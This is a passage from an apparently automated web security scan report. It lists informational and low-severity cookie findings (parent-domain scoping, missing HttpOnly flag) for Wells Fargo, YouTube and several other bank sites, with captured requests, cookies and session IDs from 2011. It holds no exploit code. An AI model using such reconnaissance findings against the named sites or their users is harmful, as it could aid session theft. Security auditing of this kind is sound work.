The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitemap HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:30:01 GMT
Content-length: 11525
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=BTp2NJhLsKNhHMTBQmCnJr9FVstXChTLdy3nnj71Z2LlVfPHnRfH!-1672152970; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Sitemap</title>
   <meta name="
...[SNIP]...

10.197. https://www.wellsfargo.com/student/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /student/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /student/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:44 GMT
Content-length: 11102
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=6TvRNJhY125zTwF4f6Qfyy7MFhjnl1ynTFX1D79WTJGDGWP1JHHW!1758734416; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2230606602.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Student Loans, College
...[SNIP]...

10.198. https://www.wellsfargo.com/student/loans/apply  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /student/loans/apply

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /student/loans/apply HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:45 GMT
Location: https://www.wellsfargo.com/student/apply
Set-Cookie: wcmcookiewf=Pvs8NJhZRksHLhJMnlf8LRvg31mfhM3JhG2tbcvt12x61nL1LDcq!854257767; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/student
...[SNIP]...

10.199. https://www.wellsfargo.com/tas  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /tas

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /tas HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/
Origin: https://www.wellsfargo.com
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=EF949CC12A6233AB; JSESSIONID=A063DC75E80493714CD441148D97EDA0; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER
Content-Length: 312

ids=WF_CON_HP_PRIMARY_BNR,WF_CON_HP_SECONDARY_A_BNR,WF_CON_HP_SECONDARY_B_BNR,WF_CON_HP_SECONDARY_C_BNR&default=WF_CON_HP_PRIMARY_BNR,WF_CON_HP_SECONDARY_A_BNR,WF_CON_HP_SECONDARY_B_BNR,WF_CON_HP_SECO
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:01:02 GMT
Content-type: text/html
Set-cookie: TCID=0007ae71-98bc-bd52-84ae-888500000049;Domain=.wellsfargo.com;Expires=Fri, 01-Feb-2013 22:01:02 GMT;Path=/
Set-cookie: NSC_XfmmtGbshp4=445b327f7863;Domain=.wellsfargo.com;Expires=Thu, 03-Feb-2011 02:01:02 GMT;Path=/
Content-Length: 0


10.200. https://www.wellsfargo.com/theprivatebank/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /theprivatebank/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /theprivatebank/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:52 GMT
Content-length: 10631
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=STpMNJhQDybSSxHpfhJTFJbY0kNSfpnGW0Fr1nv1mPTTvFqV112n!805790998; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2499042058.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>The Private Bank - Wea
...[SNIP]...

10.201. https://www.wellsfargo.com/wachovia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wachovia HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:16 GMT
Content-length: 9975
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=3SppNJhcnv0hcQFv6dfXLt0v608QpNnhXmnDLfJKH2M4Rnc1Bvrg!349572437; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo and Wachov
...[SNIP]...

10.202. https://www.wellsfargo.com/wachovia/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wachovia/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:16 GMT
Content-length: 9975
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=PTvJNJhcrLjppxSd5CbQ8FhVRPVSLn2Kfk1RZTbVT3krLTx1rHxF!-1341910901; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2381601546.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo and Wachov
...[SNIP]...

10.203. https://www.wellsfargo.com/wachovia/autoloans/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia/autoloans/index

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wachovia/autoloans/index HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:12 GMT
Content-length: 4590
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=xppZNJhY7LvrJcpTHmP3cLJpZ1LLPmJkQcPqxfFd8Jckb76K9Gqk!457746116; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

10.204. https://www.wellsfargo.com/wachovia/insurance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia/insurance

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wachovia/insurance HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:13 GMT
Content-length: 5083
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=HytTNJhZ4qF17hkd05bFxvjm5pjLJZ9SDp232hnZzlBSfDqphjTm!524336973; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2666814218.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

10.205. https://www.wellsfargo.com/wachovia/wealthmanagement/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia/wealthmanagement/index

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wachovia/wealthmanagement/index HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:16 GMT
Content-length: 4878
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=dxGyNJhbxRKXvmT8XrCKRL6C9YBQ3p3ySlqlWCRgYtL9pkZny1NT!1893615402; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1727290122.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wachovia to Wells Fargo Inter
...[SNIP]...

10.206. https://www.wellsfargo.com/wf/product/apply  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wf/product/apply

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wf/product/apply HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:59 GMT
X-Cnection: close
Location: https://www.wellsfargo.com:443/customerApp/product/apply
Set-Cookie: wcmcookiewf=s4dGNJhHTLYKQd31wnpL6N3j4P7bSHpcqpvSv2FCsqkGdJJv959t!457746116; domain=.wellsfargo.com; path=/; secure
Content-Language: en
Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com:443/cus
...[SNIP]...

10.207. https://www.wellsfargo.com/wfonline/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wfonline/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wfonline/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:31 GMT
Content-length: 10682
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=LFLMNJhLFspBQNbCyRYTSn9pmtPgVnCyNmJyyp061QdHMd9nSSHJ!-231273820; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2113166090.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Online</ti
...[SNIP]...

10.208. https://www.wellsfargo.com/wfonline/bill_pay/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wfonline/bill_pay/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wfonline/bill_pay/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:32 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=Hn32NJhMGlNPQpv5W4QlN8XHcN1XlnXBjNr1nj2CLZHRGdv7pWzW!349572437; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Online - Bill Pay<
...[SNIP]...

10.209. http://www.youtube.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:17:42 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=5dLkeuUpIfY; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 01:17:42 GMT
Set-Cookie: PREF=f1=40000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 01:17:42 GMT
Set-Cookie: GEO=6f524a5d4479091d5f7b3cf435ef185ecwsAAAAzR0KtwdbzTUoCNg==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nLThsU052OXJEdFdlVUxwdEZKT2d5N0ZVdk1pcWs2R3ljMzFYRmY0WHlVUnZId25ZWTFTYktR -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...

10.210. http://www.youtube.com/results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /results

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /results?q=ipboard+software&um=1&ie=UTF-8&sa=N&hl=en&tab=w1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 303 See Other
Date: Thu, 03 Feb 2011 01:17:40 GMT
Server: wiseguy/0.6.7
Content-Length: 0
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=wZAocj4s5iU; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 01:17:40 GMT
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 01:17:40 GMT
Set-Cookie: GEO=a3d95a7bd51bd648b14403d33e4e31fdcwsAAAAzVVOtwdbzTUoCNA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Location: http://www.youtube.com/das_captcha?next=http%3A//www.youtube.com/results%3Fq%3Dipboard%2Bsoftware%26um%3D1%26ie%3DUTF-8%26sa%3DN%26hl%3Den%26tab%3Dw1
Connection: close


10.211. http://www.youtube.com/watch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /watch

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /watch HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 303 See Other
Date: Thu, 03 Feb 2011 01:17:43 GMT
Server: wiseguy/0.6.7
Content-Length: 0
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=XJ-WTjH7UMA; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 01:17:43 GMT
Set-Cookie: GEO=61c81e28805bccac540fef7fe21d6dafcwsAAAAzVVOtwdbzTUoCNw==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Location: http://www.youtube.com/das_captcha?next=http%3A%2F%2Fwww.youtube.com%2Fwatch&ytsession=tPkJgKGgiVxR6VkyDxY0jMxu78qvhsjgoVr5s_OceJDQL_gh8WA3DK0wRe7SuQUcEQAF3en5aCBxUZe2i0H_Uofu5XRfNzNbj2jrlPvXTLDTPY8C_VQ_zsdHASZNpsQr-KXA7tSvZWfgU_4a1hlfLTkjpIknV7Cl1-2DLxGPithWt5ElD7hFmCXFR8gZVhBZOSKLuqeNRgqcMWiQeKdObub0ZNOc-1n1VomUbzwuBxm29IkoaDB3UA_wKtjbqiJ_amyjAQEZhbJaIA8HZAcU4ENpdzK6ncp3ZJ01PYBydW7KX5cIkc2Zvw
Connection: close


10.212. https://www2.bankofamerica.com/promos/jump/greatdeals/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.bankofamerica.com
Path:   /promos/jump/greatdeals/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promos/jump/greatdeals/ HTTP/1.1
Host: www2.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:30:12 GMT
Content-type: magnus-internal/cold-fusion
Set-Cookie: SMIDENTITY=0UqbHxrdFB+IZK/yIQDzBx9SGv6BGzL7lzH4+m2m5Ag/SL9g3npRFfVI6KIEmu0/Hod7q4EuA6oQzDdS85o0coYHleZFid+LBGvSY5uZLDygIZeae1UW2VBI88kvQSWsFmOlVn5ZEmIo2pN8snUAFivEWp9gsATazmwhZjY9EzqSNnEBTOjkBSSYcTUyCwY3NSVzGO93DWb469Ts3G/FPGczX6tRnbWL6wLVjkb8afFGuYjisfHuVsWpgdMI5dnkNoJ77iZMPx7Ff3x7H4Um8dmvEOCfQ82H3QQmiLdgmuMYSmX2E4DMfhH+mVL8nqqXb1tWI4F55ChQZPtkyefbEs1rNkirDxvvGe2qQe33bFK1n6kE4VHyP8PFs6toDIGPr26lPotHq/TiTLqEm2Tm6b3uxs/3VLAjG9MoImDw/AfxTngVEJ7x9tafVeZOmteLNMr255a5XDiYVNFUeFQqVHqg8rSJii6JhV2ShUOawB6iMsk690ww5mVHKkPF1lMW; path=/; domain=.bankofamerica.com; secure
Location: http://www.bankofamerica.com/promos/jump/greatdeals2/?dbgredir=
Connection: close


10.213. https://www6.bankofamerica.com/planning/investments.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www6.bankofamerica.com
Path:   /planning/investments.action

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /planning/investments.action HTTP/1.1
Host: www6.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:30:15 GMT
Content-type: text/html
Set-Cookie: TLTSID=01EAE3C62F1C102FF420FC65CDE09FEF; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=01EAE3C62F1C102FF420FC65CDE09FEF; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:30:15 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: no-cache, post-check=0, pre-check=0
Content-language: en-US
Set-cookie: JSESSIONID=0000r3FrrbR9U4oqGFNN1W9Hqpz:12qb4k2ev; Path=/
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...

11. Cookie without HttpOnly flag set  previous  next
There are 751 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



11.1. http://careers.bankofamerica.com/overview/overview.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://careers.bankofamerica.com
Path:   /overview/overview.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /overview/overview.asp HTTP/1.1
Host: careers.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:01:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 40467
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAQSBBASC=BDAGOJOAAKJHPBJKHEJODHFO; path=/
Cache-control: private


<!-- Header -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="Desc
...[SNIP]...

11.2. http://careers.jpmorganchase.com/career/careerhome  previous  next

Summary

Severity:   Low
Confidence:   Firm
